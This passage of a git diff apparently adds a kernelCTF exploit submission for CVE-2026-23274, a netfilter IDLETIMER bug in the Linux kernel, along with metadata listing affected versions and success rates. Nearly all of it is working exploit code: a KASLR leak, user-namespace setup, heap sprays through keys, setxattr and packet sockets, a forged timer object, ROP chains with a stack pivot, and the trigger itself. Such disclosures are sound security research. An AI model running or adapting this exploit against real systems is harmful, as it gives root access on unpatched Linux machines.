memcpy(pivot_metadata.data() + 0x66, &pop_rsp_pop_r13_ret, + sizeof(pop_rsp_pop_r13_ret)); + + Payload pivot_payload(0x98 + stage2_stack.GetByteSize()); + pivot_payload.Set(0x00, pivot_metadata); + pivot_payload.Set(0x98, stage2_stack.GetData()); + + RopChain pivot_setup_rop(*g_target, kaslr); + append_payload_write(pivot_setup_rop, pivot_base, pivot_payload); + for (uint64_t word : pivot_setup_rop.GetDataWords()) + ctx[rop++] = word; + + // Softirq -> process-context bridge: + // queue fake work on CPU0 via execute_in_process_context+0x48 + // then stop CPU1 so CPU0 can run the queued kworker path + RopChain queue_bridge(*g_target, kaslr); + add_target_rop_action(queue_bridge, "queue_work_cpu0_then_stop", + {work_base, 0x0}); + for (uint64_t word : queue_bridge.GetDataWords()) + ctx[rop++] = word; + + // For 3.5 GB mem + pgvAdd(1,9,0x610); + size_t to_allocate = 0x7600; + for(int i = 0 ; i < to_allocate; i+=1){ + char* addr = (char*)mmap(0,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE,-1,0); + if( (long ) addr == -1 ) + break; + memcpy(addr,ctx,sizeof(ctx)); + } + pgvDel(1); +} + +#define N_THREADS 1 +void NPERM(){ + int pid =fork(); + if(pid==0){ + nperm(); + exit(0); + } + waitpid(pid,0,0); +} +/* ============================= Nperm =============================*/ + +/* ========================= General Hepler ======================== */ +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + perror("SYSCHK(" #x ")"); \ + __res; \ + }) + + +#include +void pin_to_cpu(int cpu) { + cpu_set_t set; + if (cpu < 0) + return; + CPU_ZERO(&set); + CPU_SET((unsigned)cpu, &set); + SYSCHK(sched_setaffinity(0, sizeof(set), &set)); +} +/* ========================= General Hepler ======================== */ + +/* ======================= key_payload spray ======================= */ +#include +// #include +enum { + kWarmupKeyCount = 8, + kStageKeyCount = 40, +}; + +long long counter = 0; +int warmup_keys[kWarmupKeyCount]; +int stage_keys[kStageKeyCount]; +char description[0x20]; +unsigned char buf[0x1000]; +int key_alloc_fast() { + snprintf(description, sizeof(description), "key%lld", counter++); + // return keyAdd(description, buf, 220); + return syscall(__NR_add_key, "user", description, buf, 220, KEY_SPEC_PROCESS_KEYRING); +} + +int key_unlink_fast(int key) { + // return keyDel(key); // this uses KEYCTL_REVOKE, but we want KEYCTL_UNLINK. + return syscall(__NR_keyctl, KEYCTL_UNLINK, key, KEY_SPEC_PROCESS_KEYRING); +} +/* ======================= key_payload spray ======================= */ + +/* ========================= setxattr spray ======================== */ +#include +unsigned char buf_a[0x1000]; +void setxattr_spray() { // not exist in libxdk + setxattr("/tmp/frank", "spray", buf_a, 220, XATTR_CREATE); +} +/* ========================= setxattr spray ======================== */ + +/* =============================== User NS =============================== */ +#include +#include +#define W(path, fmt, ...) ({ \ + char __b[128]; \ + int __n = snprintf(__b, sizeof(__b), fmt, ##__VA_ARGS__); \ + int __fd = SYSCHK(open(path, O_WRONLY)); \ + if (SYSCHK(write(__fd, __b, __n)) != __n) \ + perror("short write"); \ + close(__fd); \ +}) + +void unshare_setup() { + uid_t u = getuid(); + gid_t g = getgid(); + SYSCHK(unshare(CLONE_NEWUSER)); + W("/proc/self/setgroups", "deny\n"); + W("/proc/self/uid_map", "0 %d 1\n", u); + W("/proc/self/gid_map", "0 %d 1\n", g); + SYSCHK(setresgid(0,0,0)); + SYSCHK(setresuid(0,0,0)); + SYSCHK(unshare(CLONE_NEWNET | CLONE_NEWNS)); +} +/* =============================== User NS =============================== */ + +struct ipt_replace *repl; +size_t repl_len; +void vuln_setup(int fd); + +int trigger_vuln() { // This should crash the kernel directly + system("echo 233 > /tmp/frank"); // for setxattr spray + ((long long*)buf_a)[19] = 4000; // expires + ((long long*)buf_a)[20] = 0xdeadbeefcafebabe; // RIP + unshare_setup(); + while (1) { + int fd = SYSCHK(socket(AF_INET, SOCK_RAW, IPPROTO_RAW)); + vuln_setup(fd); + setxattr_spray(); + SYSCHK(setsockopt(fd, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, (socklen_t)repl_len)); + sleep(2); + close(fd); + } + sleep(999); + return 0; +} + +int main(int argc, char **argv) { + if (argc > 1 && strcmp(argv[1], "--vuln-trigger") == 0) { + return trigger_vuln(); + } + pin_to_cpu(1); + init_libxdk(); + uint64_t num_pages = g_target->GetNumPages(); + kaslr = leak_kaslr_base(num_pages, /* samples = */ 100, /* trials = */ 3); + // kaslr = bypass_kaslr(); + printf("[+] KASLR slide: 0x%lx\n", kaslr); + setup_kernel_address(); + size_t timer_entry_pprev_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.entry.pprev") / sizeof(uint64_t); + size_t timer_expires_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.expires") / sizeof(uint64_t); + size_t timer_function_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.function") / sizeof(uint64_t); + size_t timer_flags_idx = + g_target->GetFieldOffset("idletimer_tg", "timer.flags") / sizeof(uint64_t); + + system("echo 233 > /tmp/frank"); // for setxattr spray + NPERM(); + puts("NPERM done."); + + // for (int i = 0; i < 25; i++) { + // ((long long*)buf)[i] = 0x2809099f00000000 + (i << 16); + // } + // =============================== fengshui payload =============================== + ((long long*)buf)[6] = nperm_stage1_dispatch; // rax=pc + // nperm_stage1_dispatch: mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; + // rbx = legit rdi, Nprem addr + // rdx = [rdi+0xc0], Nprem[24] + // rax_old = Nprem[1] + // rax_new = *(Nprem[1] + 0xa8) = new PC + ((long long*)buf)[7] = nperm_addr; // rdi + + // =============================== first UBI payload =============================== + // ((long long*)buf)[0x11] = 1; // next + ((long long*)buf_a)[timer_entry_pprev_idx] = 0; // pprev, set to 0 to skip "if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {" + ((long long*)buf_a)[timer_expires_idx] = 4000; // expires + ((long long*)buf_a)[timer_function_idx] = timer_stage1_callback; // function, use 0xffffffffc0018004 to debug + // timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; + // mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? + ((long long*)buf_a)[timer_flags_idx] = 0; // flags, set TIMER_MIGRATING will dead-lock; + + + unshare_setup(); + int fd = SYSCHK(socket(AF_INET, SOCK_RAW, IPPROTO_RAW)); + + vuln_setup(fd); + puts("Sleep for stable reclaim."); + for (int i = 0; i < 3; i++) { + printf("."); + fflush(stdout); + sleep(1); + } + + puts("\nInstalling table replacement"); + // Keep the exploit non-interactive for repeated VM-side retries. + for (int i = 0; i < kWarmupKeyCount; i++) { + warmup_keys[i] = SYSCHK(key_alloc_fast()); + } + for (int i = 0; i < kStageKeyCount; i++) { + stage_keys[i] = SYSCHK(key_alloc_fast()); + } + SYSCHK(key_unlink_fast(stage_keys[29])); + SYSCHK(key_unlink_fast(stage_keys[33])); + // SYSCHK(key_unlink_fast(stage_keys[36])); + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); // https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2024-53164_lts_cos_mitigation/exploit/lts-6.6.60/exploit.c#L205-L210 + setxattr_spray(); + // Trigger kmalloc then UBI + SYSCHK(setsockopt(fd, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, (socklen_t)repl_len)); + sleep(999); +} + +// --- Exploit ends --- + +// --- Below are bug triggering functions --- + +#include +#include + +#ifdef __cplusplus +typedef struct ipt_entry_marshaled { + struct ipt_ip ip; + unsigned int nfcache; + __u16 target_offset; + __u16 next_offset; + unsigned int comefrom; + struct xt_counters counters; + __extension__ unsigned char elems[0]; +} ipt_entry_marshaled; + +static_assert(sizeof(ipt_entry_marshaled) == sizeof(struct ipt_entry), + "ipt_entry size drift"); +static_assert(alignof(ipt_entry_marshaled) == alignof(struct ipt_entry), + "ipt_entry align drift"); +static_assert(offsetof(ipt_entry_marshaled, elems) == + offsetof(struct ipt_entry, elems), + "ipt_entry elems offset drift"); +#else +typedef struct ipt_entry ipt_entry_marshaled; +#endif + +struct ipt_standard { + ipt_entry_marshaled entry; + struct xt_standard_target target; +}; + +struct ipt_error { + ipt_entry_marshaled entry; + struct xt_error_target target; +}; + +#ifdef __cplusplus +static_assert(offsetof(ipt_standard, target) == sizeof(struct ipt_entry), + "ipt_standard target offset drift"); +static_assert(sizeof(ipt_standard) == + sizeof(struct ipt_entry) + sizeof(struct xt_standard_target), + "ipt_standard size drift"); + +static_assert(offsetof(ipt_error, target) == sizeof(struct ipt_entry), + "ipt_error target offset drift"); +static_assert(sizeof(ipt_error) == + sizeof(struct ipt_entry) + sizeof(struct xt_error_target), + "ipt_error size drift"); +#endif + +void init_standard_accept(struct ipt_standard *s) { + memset(s, 0, sizeof(*s)); + s->entry.target_offset = sizeof(struct ipt_entry); + s->entry.next_offset = sizeof(*s); + s->target.target.u.user.target_size = XT_ALIGN(sizeof(struct xt_standard_target)); + s->target.verdict = -NF_ACCEPT - 1; +} + +void init_error(struct ipt_error *e) { + memset(e, 0, sizeof(*e)); + e->entry.target_offset = sizeof(struct ipt_entry); + e->entry.next_offset = sizeof(*e); + e->target.target.u.user.target_size = XT_ALIGN(sizeof(struct xt_error_target)); + memcpy(e->target.target.u.user.name, XT_ERROR_TARGET, sizeof(XT_ERROR_TARGET)); + memcpy(e->target.errorname, "ERROR", 5); +} + +void init_idletimer_rule_v1_alarm(unsigned char *buf, size_t rule_sz, const char *label, uint32_t timeout) { + struct ipt_entry *e = (struct ipt_entry *)buf; + struct xt_entry_target *t; + struct idletimer_tg_info_v1 *info; + const size_t target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info_v1)); + + memset(buf, 0, rule_sz); + e->target_offset = sizeof(struct ipt_entry); + e->next_offset = (uint16_t)rule_sz; + + t = (struct xt_entry_target *)(buf + e->target_offset); + memset(t, 0, target_sz); + t->u.user.target_size = (uint16_t)target_sz; + memcpy(t->u.user.name, "IDLETIMER", sizeof("IDLETIMER")); + t->u.user.revision = 1; + + info = (struct idletimer_tg_info_v1 *)t->data; + memset(info, 0, sizeof(*info)); + info->timeout = timeout; + strncpy(info->label, label, sizeof(info->label) - 1); + info->send_nl_msg = 0; + info->timer_type = XT_IDLETIMER_ALARM; +} + +void init_idletimer_rule_v0(unsigned char *buf, size_t rule_sz, const char *label, uint32_t timeout) { + struct ipt_entry *e = (struct ipt_entry *)buf; + struct xt_entry_target *t; + struct idletimer_tg_info *info; + const size_t target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info)); + + memset(buf, 0, rule_sz); + e->target_offset = sizeof(struct ipt_entry); + e->next_offset = (uint16_t)rule_sz; + + t = (struct xt_entry_target *)(buf + e->target_offset); + memset(t, 0, target_sz); + t->u.user.target_size = (uint16_t)target_sz; + memcpy(t->u.user.name, "IDLETIMER", sizeof("IDLETIMER")); + t->u.user.revision = 0; + + info = (struct idletimer_tg_info *)t->data; + memset(info, 0, sizeof(*info)); + info->timeout = timeout; + strncpy(info->label, label, sizeof(info->label) - 1); +} + +void vuln_setup(int fd) { + struct ipt_getinfo gi; + memset(&gi, 0, sizeof(gi)); + memcpy(gi.name, "filter", 7); + socklen_t gil = sizeof(gi); + SYSCHK(getsockopt(fd, IPPROTO_IP, IPT_SO_GET_INFO, &gi, &gil)); + + const unsigned int valid = (1u << NF_INET_LOCAL_IN) | (1u << NF_INET_FORWARD) | (1u << NF_INET_LOCAL_OUT); + const size_t std_sz = sizeof(struct ipt_standard); + const size_t err_sz = sizeof(struct ipt_error); + const size_t rule1_target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info_v1)); + const size_t rule1_sz = XT_ALIGN(sizeof(struct ipt_entry) + rule1_target_sz); + const size_t rule0_target_sz = XT_ALIGN(sizeof(struct xt_entry_target) + sizeof(struct idletimer_tg_info)); + const size_t rule0_sz = XT_ALIGN(sizeof(struct ipt_entry) + rule0_target_sz); + const size_t total = std_sz + std_sz + rule1_sz + rule0_sz + std_sz + err_sz; + repl_len = sizeof(struct ipt_replace) + total; + repl = (struct ipt_replace *)calloc(1, repl_len); + memcpy(repl->name, "filter", 7); + repl->valid_hooks = valid; + repl->num_entries = 6; + repl->size = (unsigned int)total; + repl->num_counters = gi.num_entries; + repl->hook_entry[NF_INET_LOCAL_IN] = 0; + repl->underflow[NF_INET_LOCAL_IN] = 0; + repl->hook_entry[NF_INET_FORWARD] = (unsigned int)std_sz; + repl->underflow[NF_INET_FORWARD] = (unsigned int)std_sz; + repl->hook_entry[NF_INET_LOCAL_OUT] = (unsigned int)(std_sz + std_sz); + repl->underflow[NF_INET_LOCAL_OUT] = (unsigned int)(std_sz + std_sz + rule1_sz + rule0_sz); + unsigned char *p = (unsigned char *)repl->entries; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + + char str[0x20] = "love_frank"; + init_idletimer_rule_v1_alarm(p, rule1_sz, str, 3600); + p += rule1_sz; + init_idletimer_rule_v0(p, rule0_sz, str, 1); + p += rule0_sz; + init_standard_accept((struct ipt_standard *)p); + p += std_sz; + + init_error((struct ipt_error *)p); +} + +/* =================== Bug trigger ends ===================*/ + +/* =================== NPrem Helper ===================*/ +#define PAGE_SIZE 0x1000 +#include +typedef struct { + int fd; + char *mapped; + size_t size; +} pgv_frame_t; +pgv_frame_t pgv[2] = {}; +int pgv_create_socket(size_t block_size, size_t block_nr) { + int socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); + if (socketfd < 0) { + perror("socket"); + return -1; + } + + int version = TPACKET_V1; + if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { + perror("setsockopt PACKET_VERSION"); + close(socketfd); + return -1; + } + + struct tpacket_req req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_block_nr = block_nr; + req.tp_frame_size = PAGE_SIZE; + req.tp_frame_nr = (block_size * block_nr) / PAGE_SIZE; + + if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { + perror("setsockopt PACKET_TX_RING"); + close(socketfd); + return -1; + } + + return socketfd; +} + +void pgvAdd(int idx, int order, int nr) { + size_t block_size = PAGE_SIZE * (1 << order); + pgv[idx].fd = pgv_create_socket(block_size, nr); + pgv[idx].size = block_size * nr; +} + +void *pgvMap(int idx) { + pgv[idx].mapped = (char*)mmap(NULL, pgv[idx].size, PROT_READ | PROT_WRITE, MAP_SHARED, pgv[idx].fd, 0); + if (pgv[idx].mapped == MAP_FAILED) { + perror("mmap"); + return NULL; + } + return pgv[idx].mapped; +} + +void pgvDel(int idx) { + if (pgv[idx].mapped && pgv[idx].mapped != MAP_FAILED) { + munmap(pgv[idx].mapped, pgv[idx].size); + pgv[idx].mapped = NULL; + } + if (pgv[idx].fd > 0) { + close(pgv[idx].fd); + pgv[idx].fd = 0; + } + pgv[idx].size = 0; +} +/* =================== NPrem Helper ===================*/ diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json new file mode 100644 index 000000000..b92993ea9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/metadata.json @@ -0,0 +1,27 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp457"], + "vulnerability": { + "cve": "CVE-2026-23274", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf", + "affected_versions": ["5.7-rc1 - 7.0-rc3"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NETFILTER_XTABLES", + "CONFIG_NETFILTER_XT_TARGET_IDLETIMER", + "CONFIG_IP_NF_IPTABLES" + ] + } + }, + "exploits":{ + "cos-113-18244.582.2": { + "environment": "cos-113-18244.582.2", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "2 ~ 3 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz new file mode 100644 index 000000000..ecf6f5d0a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23274_cos/original.tar.gz differ